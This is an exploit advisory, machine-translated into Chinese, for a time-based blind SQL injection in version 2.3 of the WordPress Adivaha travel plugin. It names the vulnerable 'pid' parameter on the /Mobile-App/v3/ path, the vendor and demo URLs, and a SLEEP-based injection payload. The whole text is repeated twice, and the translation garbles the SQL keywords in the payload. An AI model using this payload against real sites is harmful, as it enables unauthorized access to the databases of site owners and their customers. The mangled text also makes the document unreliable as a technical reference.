#利用标题: WordPress Adivaha旅行插件2.3 -SQL注入
#利用作者:饼干
#日期: 29/07/2023
#vendor:阿迪瓦哈- 旅行科技公司
#供应商homepage: https://www.adivaha.com/
#软件link: https://wordpress.org/plugins/adiaha-hotel/
#demo: https://www.adivaha.com/demo/adivaha-online/
#版本: 2.3
#测试在: Windows 10 Pro
#Impact:数据库访问
## 问候
the_pitbull,raz0r,ins,sadsoul,his0k4,hussin x,sql先生,moizsid09,indoushka
cryptojob(Twitter)twitter.com/0x0cryptojob
## 描述
SQL注入攻击可以允许未经授权访问敏感数据,修改
数据并崩溃应用程序或使其无法使用,导致收入损失,并且
损害公司声誉。
PATH:/移动应用/V3/
获取参数“ PID”很容易受到SQL注入的影响
https://website/Mobile-App/v3/?pid=[sqli] ismobile=chatbot
---
参数: PID(GET)
Type:基于时间的盲人
title: mysql=5.0.12基于时间的盲人(查询睡眠)
PAYLOAD: PID=77A89299'XOR(SELECT(0)来自(Select(Sleep(6)))a)xor'zismobile=chatbot
---
[-] 完毕
#利用作者:饼干
#日期: 29/07/2023
#vendor:阿迪瓦哈- 旅行科技公司
#供应商homepage: https://www.adivaha.com/
#软件link: https://wordpress.org/plugins/adiaha-hotel/
#demo: https://www.adivaha.com/demo/adivaha-online/
#版本: 2.3
#测试在: Windows 10 Pro
#Impact:数据库访问
## 问候
the_pitbull,raz0r,ins,sadsoul,his0k4,hussin x,sql先生,moizsid09,indoushka
cryptojob(Twitter)twitter.com/0x0cryptojob
## 描述
SQL注入攻击可以允许未经授权访问敏感数据,修改
数据并崩溃应用程序或使其无法使用,导致收入损失,并且
损害公司声誉。
PATH:/移动应用/V3/
获取参数“ PID”很容易受到SQL注入的影响
https://website/Mobile-App/v3/?pid=[sqli] ismobile=chatbot
---
参数: PID(GET)
Type:基于时间的盲人
title: mysql=5.0.12基于时间的盲人(查询睡眠)
PAYLOAD: PID=77A89299'XOR(SELECT(0)来自(Select(Sleep(6)))a)xor'zismobile=chatbot
---
[-] 完毕
